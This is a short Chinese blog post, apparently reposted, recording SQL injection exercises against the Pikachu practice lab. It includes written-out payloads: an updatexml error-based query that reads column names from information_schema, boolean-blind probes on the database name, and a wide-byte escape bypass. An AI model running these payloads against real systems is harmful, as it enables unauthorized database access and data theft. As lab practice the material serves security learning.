pikachu的sql注入
Posted p201721440034
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了pikachu的sql注入相关的知识,希望对你有一定的参考价值。
数字型注入(post)
burp抓包
成功
字符型注入(get)
直接注入
成功注入。
搜索型注入
使用同样的方法也能同样注入成功
xx型注入
需要闭合
加)之后注入成功。
insert/updata 注入
a‘ or updatexml(1,concat(0x7e, (select column_name from information_schema.columns where table_name=‘member‘ limit 1,1)), 0) or ‘
burp抓包修改
注入成功。
delete 注入
注入成功
http header注入
注入成功
盲注 base on boolian
kobe‘ and length(database())>5#
。。。
kobe‘ and length(database())=7#
kobe‘ and ascii(substr(database(), 1, 1)) > 105#
慢慢盲注,只能挨个试。。
盲注(based on time)
同样的也是挨个试,这次看对错是看这个反应时间,要是可以的话就会五秒多一些。
宽字节注入
刚开始尝试发现注入不行,抓包发现以及进行了编码
在抓包后修改也不行
发现‘被后台转移,所以构造payload kobe%df‘ or 1=1#
注入成功
以上是关于pikachu的sql注入的主要内容,如果未能解决你的问题,请参考以下文章